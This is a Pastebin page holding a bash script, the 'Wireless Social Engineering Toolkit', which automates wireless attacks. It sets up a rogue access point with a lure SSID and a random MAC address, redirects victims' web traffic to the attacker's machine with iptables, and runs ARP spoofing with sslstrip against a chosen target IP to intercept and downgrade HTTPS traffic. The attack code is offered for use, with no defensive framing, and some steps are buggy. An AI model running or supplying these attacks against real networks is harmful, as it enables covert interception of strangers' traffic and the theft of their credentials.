API tools faq
paste
Advertisement
securitytutorials

Wireless Social Engineering Toolkit

securitytutorials
Apr 6th, 2012
844
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 13.27 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/bash
  2. #This is a program sets up a fake access point and redirects all traffic to
  3. #you...created by johnny
  4. #resources:
  5. #http://teh-geek.com/?p=512
  6. #forward all traffic to host:iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
  7.  
  8. function intro {
  9. clear
  10. echo "###############################################################################"
  11. echo "#                        Wireless Social Engineering Toolkit                  #"
  12. echo "#                                                                             #"
  13. echo "#                       This is a Wireless Social Engineering                 #"
  14. echo "#                    Toolkit that helps you with wireless attacks             #"
  15. echo "#                                                                             #"
  16. echo "#                                                                             #"
  17. echo "#                                Created by Johnny                            #"
  18. echo "###############################################################################"
  19. }
  20.  
  21. function choose {
  22.     #lets you select the type of attack
  23.     intro  
  24.     echo "What type of wireless attack do you want to do[1/2]?"
  25.     echo "1. Create Access Point and Forward all internet traffic to the Internet"
  26.     echo "2. Create Access Point and forward all traffic to your localhost"
  27.     echo "3. Create access point and forward all traffic to your localhost and then the internet"
  28.     echo "4. Commense mitm attack and run sslstrip"
  29.     echo "5. Commense mitm attack and forward all internet traffic to you and then the internet after attack"
  30.     read ATTACK
  31.     if [ "$ATTACK" = "1" ]; then
  32.         #setup
  33.         attack1
  34.     elif [ "$ATTACK" = "2" ]; then
  35.         #attack2
  36.         #setup
  37.         attack2
  38.     elif [ "$ATTACK" = "3" ]; then
  39.         #attack3
  40.         attack3
  41.     elif [ "$ATTACK" = "4" ]; then
  42.         #attack4
  43.         attack4    
  44.     elif [ "$ATTACK" = "5" ]; then
  45.         #attack5
  46.         attack5
  47.     else
  48.         echo "Please select the correct number"
  49.     fi
  50. }
  51.  
  52. function setup {
  53.     #setup dhcp3
  54.     intro
  55.     echo "Have you already set up dhcp3-server[y/n]?"
  56.     read DHCP
  57.     if [ "$DHCP" = "y" ]; then
  58.         echo ""
  59.     elif [ "$DHCP" = "n" ]; then
  60.         echo "[>] Installing dhcp3-server[please wait]..."
  61.         apt-get install dhcp3-server -y &>/dev/null
  62.         echo "[>] Installation finished"
  63.         echo "[>] Backing up dchpd.conf to /etc/dhcp3/dhcpd.conf.backup"
  64.         mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
  65.         echo "[>] Seting up configuration file"
  66.         #write to file
  67.         echo "ddns-update-style ad-hoc;
  68. default-lease-time 600;
  69. max-lease-time 7200;
  70. subnet 192.168.2.128 netmask 255.255.255.128 {
  71. option subnet-mask 255.255.255.128;
  72. option broadcast-address 192.168.2.255;
  73. option routers 192.168.2.129;
  74. option domain-name-servers 8.8.8.8;
  75. range 192.168.2.130 192.168.2.140;
  76. }" > /etc/dhcp3/dhcpd.conf 
  77.         echo "[>] Finished dhcp setup"
  78.         read -p "Press [Enter] key to continue..."
  79.     else
  80.         echo "Please select y or n"
  81.     fi
  82.     clear
  83. }
  84.  
  85. function attack1 {
  86.     #sets up values for method 1(forwards all internet traffic to internet)
  87.     #interface
  88.     clear
  89.     intro
  90.     echo What is your fake AP interface [ex.wlan0]\:
  91.     read FAKEAP
  92.     clear
  93.     #connected interface
  94.     intro  
  95.     echo What is your interface that is connected to the Internet?
  96.     read REALAP
  97.     clear
  98.     #ssid
  99.     intro
  100.     echo SSID of your fake AP [ex.FreeHotspot with no spaces]\:
  101.     read SSID
  102.     clear
  103.     #channel
  104.     intro
  105.     echo Channel of your fake AP [1-12]?
  106.     read CHANNEL
  107.     #checking
  108.     clear
  109.     intro
  110.     echo "Is this what you selected?"
  111.     echo "Fake AP interface: $FAKEAP"
  112.     echo "Connected infterface: $REALAP"
  113.     echo "SSID: $SSID"
  114.     echo "Channel: $CHANNEL"
  115.     echo
  116.     read -p "Press [Enter] key to continue..."
  117.     clear
  118.     #end of setting up variables
  119.     #load interfaces
  120.     intro
  121.     echo "[>] Changing fake AP MAC address to random"
  122.     ifconfig $FAKEAP down
  123.     macchanger -r $FAKEAP
  124.     ifconfig $FAKEAP up
  125.     #monitor mode
  126.     echo "[>] Putting your interface in monitor mode"
  127.     airmon-ng start $FAKEAP &>/dev/null
  128.     #creating access point
  129.     echo "[>] Creating new window for creating access point"
  130.     gnome-terminal --title="airbase-ng" -x airbase-ng -e $SSID -c $CHANNEL mon0 &
  131.     echo "[*] Fake AP created"
  132.     sleep 2
  133.     #Setting up dhcp server
  134.     echo "[>] Setting up dhcp-server"
  135.     ifconfig at0 up
  136.     sleep 2
  137.     ifconfig at0 192.168.2.129 netmask 255.255.255.128 &&
  138.     route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129 &&
  139.     dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &>/dev/null &&
  140.     /etc/init.d/dhcp3-server start &>/dev/null &&
  141.     #setting up iptables   
  142.     echo "[>] Setting up iptables"
  143.     /sbin/iptables --flush && /sbin/iptables --table nat --flush && /sbin/iptables --delete-chain && /sbin/iptables --table nat --delete-chain && /sbin/iptables --table nat --append POSTROUTING --out-interface $REALAP -j MASQUERADE && /sbin/iptables --append FORWARD --in-interface at0 -j ACCEPT && echo 1 > /proc/sys/net/ipv4/ip_forward
  144.     #exiting
  145.     read -p "Press [Enter] key to quit..."
  146.     echo "[>] Killing program safely"
  147.     echo "[>] Turning off monitor mode..."
  148.     airmon-ng stop mon0 &>/dev/null
  149.     echo "[>] Putting interface at0 down..."
  150.     ifconfig at0 down &>/dev/null
  151.     echo "[>] Shutting down airbase-ng"
  152.     killall airbase-ng
  153.     echo "[>] Stoping dchp server"
  154.     /etc/init.d/dhcp3-server stop &>/dev/null
  155.     echo "[*] Thank you for using this program!"
  156.     exit
  157. }
  158.  
  159. function attack2 {
  160.     #sets up values for method 2(forwards all internet traffic to localhost without internet)  
  161.     #interface
  162.     clear
  163.     intro
  164.     echo What is your fake AP interface [ex.wlan0]\:
  165.     read FAKEAP
  166.     clear
  167.     #connected interface
  168.     intro  
  169.     echo What is your interface that is connected to the Internet?
  170.     read REALAP
  171.     clear
  172.     #ssid
  173.     intro
  174.     echo SSID of your fake AP [ex.FreeHotspot with no spaces]\:
  175.     read SSID
  176.     clear
  177.     #channel
  178.     intro
  179.     echo Channel of your fake AP [1-12]?
  180.     read CHANNEL
  181.     #checking
  182.     clear
  183.     intro
  184.     echo "Is this what you selected?"
  185.     echo "Fake AP interface: $FAKEAP"
  186.     echo "SSID: $SSID"
  187.     echo "Channel: $CHANNEL"
  188.     echo
  189.     read -p "Press [Enter] key to continue..."
  190.     clear
  191.  
  192.     #before good after bad
  193.  
  194.         #end of setting up variables
  195.     #load interfaces
  196.     intro
  197.     echo "[>] Changing fake AP MAC address to random"
  198.     ifconfig $FAKEAP down
  199.     macchanger -r $FAKEAP
  200.     ifconfig $FAKEAP up
  201.     #monitor mode
  202.     echo "[>] Putting your interface in monitor mode"
  203.     airmon-ng start $FAKEAP &>/dev/null
  204.     #creating access point
  205.     echo "[>] Creating new window for creating access point"
  206.     gnome-terminal --title="airbase-ng" -x airbase-ng -e $SSID -c $CHANNEL mon0 &
  207.     echo "[*] Fake AP created"
  208.     sleep 2
  209.     #Setting up dhcp server
  210.     echo "[>] Setting up dhcp-server"
  211.     ifconfig at0 up
  212.     sleep 2
  213.     echo "[>] Setting up iptables"
  214.     ifconfig at0 192.168.2.129 netmask 255.255.255.128 &&
  215.     route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129 &&
  216.     dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &>/dev/null &&
  217.     /etc/init.d/dhcp3-server start &>/dev/null &&
  218.     #iptables
  219.     /sbin/iptables --flush && /sbin/iptables --table nat --flush && /sbin/iptables --delete-chain && /sbin/iptables --table nat --delete-chain && /sbin/iptables --append FORWARD --in-interface at0 -j ACCEPT && echo 1 > /proc/sys/net/ipv4/ip_forward && iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.2.129
  220. #   original tables connected to internet
  221. #   /sbin/iptables --flush && /sbin/iptables --table nat --flush && /sbin/iptables --delete-chain && /sbin/iptables --table nat --delete-chain && /sbin/iptables --table nat --append POSTROUTING --out-interface $REALAP -j MASQUERADE && /sbin/iptables --append FORWARD --in-interface at0 -j ACCEPT && echo 1 > /proc/sys/net/ipv4/ip_forward && iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.2.129
  222.     echo "[>] Finished"
  223.     #--out-interface $REALAP
  224.     #exiting
  225.     read -p "Press [Enter] key to quit..."
  226.     echo "[>] Killing program safely"
  227.     echo "[>] Turning off monitor mode..."
  228.     airmon-ng stop mon0 &>/dev/null
  229.     echo "[>] Putting interface at0 down..."
  230.     ifconfig at0 down &>/dev/null
  231.     echo "[>] Shutting down airbase-ng"
  232.     killall airbase-ng
  233.     echo "[>] Stoping dchp server"
  234.     /etc/init.d/dhcp3-server stop &>/dev/null
  235.     echo "[*] Thank you for using this program!"
  236.     exit   
  237. }
  238.  
  239. function attack3 {
  240.     #sets up values for method 3(forwards all internet traffic to localhost then internet) 
  241.     #interface
  242.     clear
  243.     intro
  244.     echo What is your fake AP interface [ex.wlan0]\:
  245.     read FAKEAP
  246.     clear
  247.     #ssid
  248.     intro
  249.     echo SSID of your fake AP [ex.FreeHotspot with no spaces]\:
  250.     read SSID
  251.     clear
  252.     #channel
  253.     intro
  254.     echo Channel of your fake AP [1-12]?
  255.     read CHANNEL
  256.     #checking
  257.     clear
  258.     intro
  259.     echo "Is this what you selected?"
  260.     echo "Fake AP interface: $FAKEAP"
  261.     echo "SSID: $SSID"
  262.     echo "Channel: $CHANNEL"
  263.     echo
  264.     read -p "Press [Enter] key to continue..."
  265.     clear
  266.  
  267.     #before good after bad
  268.  
  269.         #end of setting up variables
  270.     #load interfaces
  271.     intro
  272.     echo "[>] Changing fake AP MAC address to random"
  273.     ifconfig $FAKEAP down
  274.     macchanger -r $FAKEAP
  275.     ifconfig $FAKEAP up
  276.     #monitor mode
  277.     echo "[>] Putting your interface in monitor mode"
  278.     airmon-ng start $FAKEAP &>/dev/null
  279.     #creating access point
  280.     echo "[>] Creating new window for creating access point"
  281.     gnome-terminal --title="airbase-ng" -x airbase-ng -e $SSID -c $CHANNEL mon0 &
  282.     echo "[*] Fake AP created"
  283.     sleep 2
  284.     #Setting up dhcp server
  285.     echo "[>] Setting up dhcp-server"
  286.     ifconfig at0 up
  287.     sleep 2
  288.     echo "[>] Setting up iptables"
  289.     ifconfig at0 192.168.2.129 netmask 255.255.255.128 &&
  290.     route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129 &&
  291.     dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &>/dev/null &&
  292.     /etc/init.d/dhcp3-server start &>/dev/null &&
  293.     #iptables
  294.     /sbin/iptables --flush && /sbin/iptables --table nat --flush && /sbin/iptables --delete-chain && /sbin/iptables --table nat --delete-chain && /sbin/iptables --append FORWARD --in-interface at0 -j ACCEPT && echo 1 > /proc/sys/net/ipv4/ip_forward && iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.2.129
  295. #   original tables connected to internet
  296. #   /sbin/iptables --flush && /sbin/iptables --table nat --flush && /sbin/iptables --delete-chain && /sbin/iptables --table nat --delete-chain && /sbin/iptables --table nat --append POSTROUTING --out-interface $REALAP -j MASQUERADE && /sbin/iptables --append FORWARD --in-interface at0 -j ACCEPT && echo 1 > /proc/sys/net/ipv4/ip_forward && iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.2.129
  297.     echo "[>] Finished"
  298.     #--out-interface $REALAP
  299.     #exiting
  300.     read -p "Press [Enter] key to give them internet..."
  301.     /sbin/iptables --flush && /sbin/iptables --table nat --flush && /sbin/iptables --delete-chain && /sbin/iptables --table nat --delete-chain && /sbin/iptables --append FORWARD --in-interface at0 -j ACCEPT && echo 1 > /proc/sys/net/ipv4/ip_forward && iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.2.129
  302.     read -p "Press [Enter] key to quit..."
  303.     echo "[>] Killing program safely"
  304.     echo "[>] Turning off monitor mode..."
  305.     airmon-ng stop mon0 &>/dev/null
  306.     echo "[>] Putting interface at0 down..."
  307.     ifconfig at0 down &>/dev/null
  308.     echo "[>] Shutting down airbase-ng"
  309.     killall airbase-ng
  310.     echo "[>] Stoping dchp server"
  311.     /etc/init.d/dhcp3-server stop &>/dev/null
  312.     echo "[*] Thank you for using this program!"
  313.     exit   
  314. }
  315.  
  316. function attack4 {
  317.     #commense an mitm attack that forwards traffic
  318.     #interface
  319.     clear
  320.     intro
  321.     echo What is your interface connected to the wireless[ex.wlan0]\:
  322.     read INTERFACE
  323.     clear
  324.     #target
  325.     clear
  326.     intro
  327.     echo What is your target ip [ex.192.168.1.2]\:
  328.     read TARGETIP
  329.     clear  
  330.     #gateway
  331.     clear
  332.     intro
  333.     echo What is your gateway ip [ex.192.168.1.1]\:
  334.     read GATEWAY
  335.     clear
  336.     #checking
  337.     clear
  338.     intro
  339.     echo "Is this what you selected?"
  340.     echo "Your connected nterface: $INTERFACE"
  341.     echo "Target ip: $TARGETIP"
  342.     echo "Gateway: $GATEWAY"
  343.     echo
  344.     read -p "Press [Enter] key to continue..."
  345.     clear
  346.     echo 1 > /proc/sys/net/ipv4/ip_forward
  347.     arpspoof -i $INTERFACE -t $TARGETIP $GATEWAY
  348.     iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
  349.     gnome-terminal --title="sslstrip" -x python /pentest/web/sslstrip/sslstrip.py &
  350.     echo "[*] MITM attack finished"
  351.     read -p "Press [Enter] key to quit..."
  352.     echo "[>] Killing arpspoof"
  353.     killall arpspoof
  354.     echo "[>] Sslstrip"
  355.     killall sslstrip
  356.     echo "[*] Finshed"
  357.     echo "[*] Thank you for using this program!"
  358. }
  359.  
  360. function attack5 {
  361.     #commense an mitm attack that forwards traffic to apache
  362.     #interface
  363.     clear
  364.     intro
  365.     echo What is your interface connected to the wireless[ex.wlan0]\:
  366.     read INTERFACE
  367.     clear
  368.     #target
  369.     clear
  370.     intro
  371.     echo What is your target ip [ex.192.168.1.2]\:
  372.     read TARGETIP
  373.     clear  
  374.     #gateway
  375.     clear
  376.     intro
  377.     echo What is your gateway ip [ex.192.168.1.1]\:
  378.     read GATEWAY
  379.     clear
  380.     #checking
  381.     clear
  382.     intro
  383.     echo "Is this what you selected?"
  384.     echo "Your connected nterface: $INTERFACE"
  385.     echo "Target ip: $TARGETIP"
  386.     echo "Gateway: $GATEWAY"
  387.     echo
  388.     read -p "Press [Enter] key to continue..."
  389.     clear
  390.     echo 1 > /proc/sys/net/ipv4/ip_forward &>/dev/null
  391.     arpspoof -i $INTERFACE -t $TARGETIP $GATEWAY &>/dev/null
  392.     iptables -t nat -A PREROUTING -p tcp --destination-port 80 &>/dev/null
  393.     echo "[*] MITM attack finished"
  394.     read -p "Press [Enter] key to continue..."
  395.     echo "[>] Killing arpspoof"
  396.     killall arpspoof
  397.     echo "[*] Finshed"
  398.     echo "[*] Thank you for using this program!"
  399. }
  400.  
  401. #Executing here
  402. setup
  403. choose
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!